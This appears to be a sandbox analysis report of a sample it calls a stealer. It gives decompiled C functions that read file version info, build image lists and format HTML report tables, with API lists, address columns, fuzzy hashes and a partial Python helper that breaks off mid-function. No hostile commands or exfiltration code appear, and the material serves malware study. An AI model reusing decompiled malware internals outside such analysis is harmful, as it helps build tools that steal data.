                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E0040DE36(intOrPtr* __edi, short* _a4) {
                                                                                                                                                				int _v8;
                                                                                                                                                				void* _v12;
                                                                                                                                                				void* _v16;
                                                                                                                                                				int _v20;
                                                                                                                                                				long _v60;
                                                                                                                                                				char _v572;
                                                                                                                                                				void* __esi;
                                                                                                                                                				int _t47;
                                                                                                                                                				void* _t50;
                                                                                                                                                				signed short* _t76;
                                                                                                                                                				void* _t81;
                                                                                                                                                				void* _t84;
                                                                                                                                                				intOrPtr* _t96;
                                                                                                                                                				int _t97;
                                                                                                                                                
                                                                                                                                                				_t96 = __edi;
                                                                                                                                                				_t97 = 0;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                                                				_v8 = _t47;
                                                                                                                                                				if(_t47 > 0) {
                                                                                                                                                					_t50 = E0040674D(__edi);
                                                                                                                                                					_push(_v8);
                                                                                                                                                					L0040E038();
                                                                                                                                                					_t84 = _t50;
                                                                                                                                                					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                                                					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                                                						_t81 = _v12;
                                                                                                                                                						_t11 = _t81 + 0x30; // 0x6cdfe853
                                                                                                                                                						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                                                						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                                                						 *__edi =  *_t13;
                                                                                                                                                						_t14 = _t81 + 0x14; // 0x5900006c
                                                                                                                                                						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                                                						_t16 = _t81 + 0x10; // 0xfee850ff
                                                                                                                                                						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                                                						_t18 = _t81 + 0x24; // 0x38680000
                                                                                                                                                						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                                                						_t20 = _t81 + 0x28; // 0xbb0040fa
                                                                                                                                                						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                                                					}
		if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
			L5:
			wcscpy( &_v60, L"040904E4");
		} else {
			_t76 = _v16;
			_push(_t76[1] & 0x0000ffff);
			_push( *_t76 & 0x0000ffff);
			_push(L"%4.4X%4.4X");
			_push(0x14);
			_push( &_v60);
			L0040DFD6();
			if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
				goto L5;
			}
		}
		E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
		E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
		E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
		E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
		E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
		E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
		E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
		E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
		_push(_t84);
		_t97 = 1;
		L0040E032();
	}
	return _t97;
}

APIs
• GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
• ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
• GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
• VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
• VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
• _snwprintf.MSVCRT ref: 0040DEE7
• wcscpy.MSVCRT ref: 0040DF11
• ??3@YAXPAX@Z.MSVCRT ref: 0040DFC1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 1223191525-1542517562
• Opcode ID: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
• Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
• Opcode Fuzzy Hash: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
• Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%
E004099C4(void* __eax) {
	struct _SHFILEINFOW _v692;
	void _v1214;
	short _v1216;
	void* _v1244;
	void* _v1248;
	void* _v1252;
	void* _v1256;
	void* _v1268;
	void* _t37;
	long _t38;
	long _t46;
	long _t48;
	long _t58;
	void* _t62;
	intOrPtr* _t64;

	_t64 = ImageList_Create;
	_t62 = __eax;
	if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
		if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
			_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
			 *(_t62 + 0x2b4) = _t48;
			__imp__ImageList_SetImageCount(_t48, 1);
			_push( *(_t62 + 0x2b4));
		} else {
			_v692.hIcon = 0;
			memset( &(_v692.iIcon), 0, 0x2b0);
			_v1216 = 0;
			memset( &_v1214, 0, 0x208);
			GetWindowsDirectoryW( &_v1216, 0x104);
			_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
			 *(_t62 + 0x2b4) = _t58;
			_push(_t58);
		}
		SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
	}
	if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
		_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
		 *(_t62 + 0x2b8) = _t46;
		__imp__ImageList_SetImageCount(_t46, 1);
		SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
	}
	 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
	_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
	_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
	_v1244 = _t37;
	__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
	_t38 = GetSysColor(0xf);
	_v1248 = _t38;
	ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
	ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
	DeleteObject(_v1268);
	DeleteObject(_v1268);
	return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
}

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00409A07
                                                                                                                                                • memset.MSVCRT ref: 00409A1C
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
                                                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
                                                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
                                                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
                                                                                                                                                • LoadImageW.USER32 ref: 00409AED
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
                                                                                                                                                • LoadImageW.USER32 ref: 00409B0A
                                                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00409B23
                                                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
                                                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00409B5A
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00409B60
                                                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 304928396-0
                                                                                                                                                • Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                • Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
                                                                                                                                                • Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                • Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                                                				int _v8;
                                                                                                                                                				void _v518;
                                                                                                                                                				long _v520;
                                                                                                                                                				void _v1030;
                                                                                                                                                				char _v1032;
                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                				wchar_t* _t57;
                                                                                                                                                				void* _t58;
                                                                                                                                                				void* _t59;
                                                                                                                                                				void* _t60;
                                                                                                                                                
                                                                                                                                                				_t58 = __esi;
                                                                                                                                                				_v520 = 0;
                                                                                                                                                				memset( &_v518, 0, 0x1fc);
                                                                                                                                                				_v1032 = 0;
                                                                                                                                                				memset( &_v1030, 0, 0x1fc);
                                                                                                                                                				_t60 = _t59 + 0x18;
                                                                                                                                                				_v8 = 1;
                                                                                                                                                				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                                                					_v8 = 0;
                                                                                                                                                				}
                                                                                                                                                				_t57 = _a4;
                                                                                                                                                				 *_t57 = 0;
                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                					wcscpy(_t57, L"<font");
                                                                                                                                                					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                					if(_t32 > 0) {
                                                                                                                                                						_push(_t32);
                                                                                                                                                						_push(L" size=\"%d\"");
                                                                                                                                                						_push(0xff);
                                                                                                                                                						_push( &_v520);
                                                                                                                                                						L0040DFD6();
                                                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                                                						_t60 = _t60 + 0x18;
                                                                                                                                                					}
                                                                                                                                                					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                                                						_push(E0040DBA9(_t33,  &_v1032));
                                                                                                                                                						_push(L" color=\"#%s\"");
                                                                                                                                                						_push(0xff);
                                                                                                                                                						_push( &_v520);
                                                                                                                                                						L0040DFD6();
                                                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                                                					}
                                                                                                                                                					wcscat(_t57, ">");
                                                                                                                                                				}
                                                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                					wcscat(_t57, L"<b>");
                                                                                                                                                				}
                                                                                                                                                				wcscat(_t57, _a8);
                                                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                					wcscat(_t57, L"</b>");
                                                                                                                                                				}
                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                					wcscat(_t57, L"</font>");
                                                                                                                                                				}
                                                                                                                                                				return _t57;
                                                                                                                                                			}
Addresses: 0x0040dc79, 0x0040dc94, 0x0040dc9b, 0x0040dca9, 0x0040dcb0, 0x0040dcb5, 0x0040dcbc, 0x0040dcc3, 0x0040dcca, 0x0040dcca, 0x0040dcd0, 0x0040dcd3, 0x0040dcd6, 0x0040dce2, 0x0040dce7, 0x0040dcee, 0x0040dcf0, 0x0040dcf1, 0x0040dcfc, 0x0040dd01, 0x0040dd02, 0x0040dd0f, 0x0040dd14, 0x0040dd14, 0x0040dd17, 0x0040dd1d, 0x0040dd2c, 0x0040dd2d, 0x0040dd38, 0x0040dd3d, 0x0040dd3e, 0x0040dd4b, 0x0040dd50, 0x0040dd59, 0x0040dd5f, 0x0040dd63, 0x0040dd6b, 0x0040dd71, 0x0040dd76, 0x0040dd80, 0x0040dd88, 0x0040dd8e, 0x0040dd92, 0x0040dd9a, 0x0040dda0, 0x0040dda6

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                • Opcode ID: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                • Instruction ID: c1522ee0e6335da557e9dda04135524704fc8f14ed906b709f088109683ecb65
                                                                                                                                                • Opcode Fuzzy Hash: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                • Instruction Fuzzy Hash: 213184B2D04306AEE720AA959C82A6B73B99F44714F10817FF215B21C2DB7859889A18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 56%
                                                                                                                                                			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t151;
				intOrPtr* _t152;
				signed int _t154;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t151 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t159 = _t157 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
				if(_t87 != 0xffffffff) {
					_t128 =  &_v964;
					_push(E0040DBA9(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040DFD6();
					_t159 = _t159 + 0x18;
				}
				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t151;
				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
						_v12 = _t154;
						_t155 = _t154 * 0x14;
						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t151;
						_t152 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
						E0040DBA9(_v32,  &_v348);
						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
						} else {
							_push( *(_t155 + _v16 + 0x10));
							_push(E0040DBA9(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x70));
							L0040DFD6();
							_t159 = _t159 + 0x14;
						}
						_t109 =  *(_t124 + 0x6c);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
							_pop(_t128);
						}
						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
						_push( *((intOrPtr*)(_t124 + 0x74)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x70));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x68)));
						L0040DFD6();
						_t159 = _t159 + 0x28;
						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
							goto L14;
						}
						_t151 = 0;
					}
				}
				L14:
				E00408857(_t124, _t128, _a4, L"</table><p>");
				return E00408857(_t124, _t128, _a4, L"\r\n");
			}
Instruction addresses, one per decompiled statement above (0x00000000 marks lines the decompiler synthesised, such as the loop exit):
0x00408c24 0x00408c2d 0x00408c45 0x00408c4c 0x00408c58 0x00408c5a 0x00408c5c 0x00408c68
0x00408c6f 0x00408c7e 0x00408c85 0x00408c94 0x00408c9b 0x00408ca2 0x00408ca7 0x00408cad
0x00408cb3 0x00408cb6 0x00408cb8 0x00408cc5 0x00408cc6 0x00408cd1 0x00408cd3 0x00408cd4
0x00408cd9 0x00408cd9 0x00408ce6 0x00408cee 0x00408cf1 0x00408cfb 0x00408d01 0x00408d07
0x00408d0a 0x00408d11 0x00408d1f 0x00408d25 0x00408d28 0x00408d2c 0x00408d30 0x00408d38
0x00408d3b 0x00408d46 0x00408d53 0x00408d69 0x00408d79 0x00408d86 0x00408dc0 0x00408d88
0x00408d8b 0x00408d9e 0x00408d9f 0x00408da4 0x00408da9 0x00408dac 0x00408db1 0x00408db1
0x00408dc7 0x00408dca 0x00408dd0 0x00408dde 0x00408de4 0x00408de4 0x00408dee 0x00408df3
0x00408dfc 0x00408e03 0x00408e04 0x00408e0d 0x00408e14 0x00408e15 0x00408e1a 0x00408e1d
0x00408e22 0x00408e2d 0x00408e32 0x00408e3b 0x00000000 0x00000000 0x00408cf9 0x00408cf9
0x00408cfb 0x00408e41 0x00408e4b 0x00408e62

Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
• API ID: _snwprintf$memset$wcscpy$wcscat
                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                • Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                • Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
                                                                                                                                                • Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                • Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 42%
			// Builds the opening of an HTML table (<table ...><tr ...>) followed by one <th> per column and
			// hands each formatted chunk to E00408857. L0040DFD6 is _snwprintf (see the API ID in the
			// Similarity block for this function). A colour argument of 0xffffffff (-1) means "no colour".
			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;        // " width=\"%s\"" for the current column, or empty (256 wide chars)
				void _v1026;
				long _v1028;       // "</font>" or empty
				void _v1538;
				char _v1540;       // "<font color=\"%s\">" or empty
				void _v2050;
				char _v2052;       // " bgcolor=\"%s\"" or empty
				char _v2564;       // scratch buffer for the colour string produced by E0040DBA9
				char _v35332;      // 0x4000-wide-char output buffer passed to E00408857
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t75 = __ecx;
				E0040E340(0x8a00, __ecx);          // stack probe for the 0x8a00-byte frame (the large local buffer)
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);        // each attribute buffer is zeroed: 4 + 0x1fc = 0x200 bytes
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					// _snwprintf(&_v2052, 0xff, L" bgcolor=\"%s\"", E0040DBA9(_a20, &_v2564))
					_push(E0040DBA9(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040DFD6();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					// _snwprintf(&_v1540, 0xff, L"<font color=\"%s\">", E0040DBA9(_a24, &_v2564)); the closing tag is fixed
					_push(E0040DBA9(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040DFD6();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				// _snwprintf(&_v35332, 0x3fff, L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n", bgcolor_attr)
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040DFD6();
				_t80 = _t79 + 0x10;
				E00408857(_a4, _t75, _a8,  &_v35332);   // emit the table opener
				_t51 = _a16;                            // column count
				if(_t51 > 0) {
					// _a12 is an array of 8-byte records {title, width}; _t73 addresses the width field,
					// _t73 - 4 the title. The loop counter reuses the _a20 slot.
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;                  // empty width string: no width attribute
						} else {
							// _snwprintf(&_v516, 0xff, L" width=\"%s\"", width)
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040DFD6();
							_t81 = _t81 + 0x10;
						}
						// _snwprintf(&_v35332, 0x3fff, L"<th%s>%s%s%s\r\n", width_attr, font_open, title, font_close)
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040DFD6();
						_t80 = _t81 + 0x1c;
						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);   // emit one header cell
						_t73 = _t73 + 8;                               // next {title, width} record
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

Instruction addresses for the statements above, in order (a side column in the original layout): 0x00409190 0x00409198 0x004091af 0x004091b6 0x004091c4 0x004091cb 0x004091d9 0x004091e0 0x004091e5 0x004091ec 0x004091fd 0x004091fe 0x00409209 0x0040920e 0x0040920f 0x00409214 0x00409214 0x0040921b 0x0040922c 0x0040922d 0x00409238 0x0040923d 0x0040923e 0x0040924f 0x00409254 0x00409254 0x0040925d 0x0040925e 0x00409269 0x0040926e 0x0040926f 0x00409274 0x00409284 0x00409289 0x0040928e 0x00409298 0x0040929b 0x0040929e 0x004092a7 0x004092ae 0x004092b3 0x004092b5 0x004092bb 0x004092d9 0x004092bd 0x004092bd 0x004092be 0x004092c9 0x004092ce 0x004092cf 0x004092d4 0x004092d4 0x004092e6 0x004092e7 0x004092f0 0x004092f7 0x004092f8 0x00409303 0x00409308 0x00409309 0x0040930e 0x0040931e 0x00409323 0x00409326 0x00409326 0x00409326 0x00000000 0x0040932f 0x00409333

Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                • Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                • Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
                                                                                                                                                • Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                • Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
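The decompiled E00409190 above is the part of the sample that formats a table header of its HTML report: an optional bgcolor attribute on the <tr>, an optional <font> wrapper, and one <th> per column, each built with _snwprintf into fixed-size wide-character buffers. The following Python is an added example, not code from the sample or from the sandbox report. It emulates that formatting so an analyst can see exactly what markup the stealer produces for a given column set, and it searches a memory dump for the function's format strings in the UTF-16LE encoding the binary actually stores them in. Assumptions, labelled in the code: E0040DBA9 renders a Win32 COLORREF as six hex digits without a '#', the records walked by _t73 are {title, width} pairs of wide-string pointers, and E00408857 appends each chunk to the report in order.

```python
"""Added example: reconstruct the HTML emitted by E00409190 and locate its
UTF-16LE format strings in a memory dump.  Not code from the sample or the
sandbox; the colour rendering and the column-record naming are assumptions."""

NO_COLOUR = 0xFFFFFFFF  # the decompiled code compares _a20/_a24 against -1

# Format strings as they appear in the decompiled function (stored as wide
# L"..." literals in the binary; shown decoded here).
FMT_BGCOLOR = ' bgcolor="%s"'
FMT_FONT_OPEN = '<font color="%s">'
FMT_FONT_CLOSE = '</font>'
FMT_TABLE = '<table border="1" cellpadding="5"><tr%s>\r\n'
FMT_WIDTH = ' width="%s"'
FMT_TH = '<th%s>%s%s%s\r\n'

# _snwprintf count arguments used by the function (in wide characters).
SMALL_LIMIT = 0xFF    # the 256-wchar attribute buffers (_v2052, _v1540, _v516)
LARGE_LIMIT = 0x3FFF  # the 0x4000-wchar output buffer (_v35332)


def colour_string(colorref):
    """Stand-in for E0040DBA9.  ASSUMPTION: the value is a Win32 COLORREF
    (0x00BBGGRR) rendered as six lowercase hex digits with no '#'."""
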